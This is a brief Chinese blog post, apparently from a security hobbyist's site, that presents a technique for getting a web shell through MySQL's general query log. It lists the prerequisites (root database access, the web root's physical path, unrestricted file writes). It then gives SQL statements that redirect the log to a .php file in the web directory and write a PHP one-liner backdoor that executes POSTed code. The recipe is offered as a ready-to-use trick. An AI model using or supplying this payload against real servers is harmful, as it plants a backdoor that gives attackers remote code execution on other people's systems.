骚思路 | Mysql通过日志拿shell

【摘要】Mysql通过日志拿shellemmm~有点舒服条件:1.root2.网站物理路径3.文件位置未被限制SQL语句:set...

Mysql通过日志拿shell

emmm~有点舒服

条件:

    1.root

    2.网站物理路径

    3.文件位置未被限制

SQL语句:

set global general_log = on;
set global general_log_file = 'C:/phpStudy/WWW/dyboy.php';
select '<?php @assert($_POST["dyboy"]); ?>';
set global general_log = off;

 小东
 简介:专业团队网站开发、安全运维,合作意向请联系!

扫码关注微信公众号:ITDYBOY,学前端,学安全,从0到1,从1到精通!

扫码关注微信公众号:ITDYBOY

发表评论

游客
送你一朵小花花~

帅人已评(9)